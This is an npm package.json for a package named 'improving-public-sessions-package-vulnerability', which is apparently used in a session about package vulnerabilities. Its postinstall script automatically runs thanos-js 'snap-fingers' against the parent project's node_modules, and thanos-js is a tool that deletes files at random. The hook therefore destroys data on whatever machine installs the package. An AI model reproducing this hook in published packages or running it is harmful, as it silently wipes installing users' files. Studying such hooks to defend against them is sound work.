{
  "name": "improving-public-sessions-package-vulnerability",
  "version": "1.0.12",
  "description": "Public practices to share with improvers",
  "main": "dist/index.js",
  "umd:main": "dist/index.umd.js",
  "module": "dist/index.js",
  "source": "src/index.js",
  "scripts": {
    "test": "echo \"Error: no test specified\" && exit 1",
    "build": "microbundle",
    "prepublish": "npm run build",
    "postinstall": "node ..\\..\\node_modules\\.bin\\thanos-js snap-fingers --with-infinity-gauntlet-glove"

  },
  "repository": {
    "type": "git",
    "url": "git+https://github.com/wareor/improving-public-sessions.git"
  },
  "keywords": [],
  "author": "JALEF",
  "license": "MIT",
  "bugs": {
    "url": "https://github.com/wareor/improving-public-sessions/issues"
  },
  "homepage": "https://github.com/wareor/improving-public-sessions#readme",
  "devDependencies": {
    "microbundle": "^0.15.0"
  },
  "files": [
    "dist",
    "package.json",
    "README.md"
  ],
  "dependencies": {
    "thanos-js": "^0.0.11"
  }
}
